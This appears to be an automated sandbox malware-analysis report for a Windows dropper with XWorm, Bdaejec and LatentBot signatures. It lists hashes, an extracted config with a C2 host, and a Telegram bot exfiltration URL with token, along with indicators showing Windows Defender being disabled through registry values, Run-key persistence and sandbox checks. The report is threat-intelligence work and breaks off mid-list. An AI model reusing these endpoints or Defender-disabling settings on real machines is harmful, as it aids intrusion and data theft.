Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
20/05/2025, 00:42
Static task
static1
Behavioral task
behavioral1
Sample
250519-z3llfszks4.exe
Resource
win10v2004-20250502-en
General
-
Target
250519-z3llfszks4.exe
-
Size
285KB
-
MD5
20841606ce69632f258221219aeee09b
-
SHA1
b72918797186774598792c47b66d5857be59f576
-
SHA256
1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
-
SHA512
aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e
-
SSDEEP
6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI
Malware Config
Extracted
xworm
3.1
grayhatgroupontop.zapto.org:1177
-
Install_directory
%AppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted
bdaejec
ddos.dnsnb8.net
Extracted
latentbot
grayhatgroupontop.zapto.org
Signatures
-
Bdaejec family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x00080000000242c9-83.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000022114-23.dat family_xworm behavioral1/memory/1008-25-0x0000000000E90000-0x0000000000EA8000-memory.dmp family_xworm -
Detects Bdaejec Backdoor. 5 IoCs
Bdaejec is backdoor written in C++.
resource yara_rule behavioral1/memory/640-570-0x00000000003E0000-0x00000000003E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/2700-569-0x00000000003E0000-0x00000000003E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/2700-1559-0x00000000003E0000-0x00000000003E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/640-1560-0x00000000003E0000-0x00000000003E9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/4472-1561-0x0000000000F90000-0x0000000000F99000-memory.dmp family_bdaejec_backdoor -
Latentbot family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 5232 created 616 5232 powershell.EXE 5 PID 4828 created 616 4828 powershell.EXE 5 -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 44 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2472 powershell.exe 3268 powershell.exe 2508 powershell.exe 5888 powershell.exe 5772 powershell.exe 3000 powershell.exe 5584 powershell.exe 3744 powershell.exe 4388 powershell.exe 388 powershell.exe 4704 powershell.exe 2664 powershell.exe 1612 powershell.exe 5240 powershell.exe 3720 powershell.exe 3700 powershell.exe 2896 powershell.exe 1764 powershell.exe 1672 powershell.exe 1596 powershell.exe 1576 powershell.exe 3428 powershell.exe 5904 powershell.exe 3108 powershell.exe 4400 powershell.exe 5244 powershell.exe 2900 powershell.exe 5300 powershell.exe 5664 powershell.exe 4852 powershell.exe 4848 powershell.exe 4912 powershell.exe 2584 powershell.exe 5452 powershell.exe 4828 powershell.EXE 4992 powershell.exe 948 powershell.exe 4048 powershell.exe 2796 powershell.exe 5232 powershell.EXE 4128 powershell.exe 2664 powershell.exe 2168 powershell.exe 1276 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4428 netsh.exe 4064 netsh.exe -
resource yara_rule behavioral1/files/0x00080000000242c3-51.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation x69.exe Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation iyMbXS.exe Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation izTLZKj.exe Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation izTLZKj.exe Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation 250519-z3llfszks4.exe Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe -
Executes dropped EXE 11 IoCs
pid Process 1008 x69.exe 928 x69.exe 5740 x69Disable-winDefender.exe 4844 x69Disable-winDefender.exe 2700 izTLZKj.exe 640 izTLZKj.exe 4588 x69install.exe 4472 iyMbXS.exe 2356 x69install.exe 2076 x69.exe 2132 x69.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" 250519-z3llfszks4.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" 250519-z3llfszks4.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" 250519-z3llfszks4.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 ip-api.com -
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5232 set thread context of 5088 5232 powershell.EXE 247 PID 4828 set thread context of 4480 4828 powershell.EXE 248 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\disabledupdater.exe iyMbXS.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\SoundRec.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ssvagent.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoia.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\XLICONS.EXE izTLZKj.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe izTLZKj.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\notification_helper.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jcmd.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javaws.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoadfsb.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\GetHelp.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteim.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\codecpacks.webp.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\policytool.exe izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\nmhproxy.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\codecpacks.webp.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\XboxIdp.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\pack200.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\misc.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\idlj.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaws.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\kinit.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe iyMbXS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iyMbXS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created 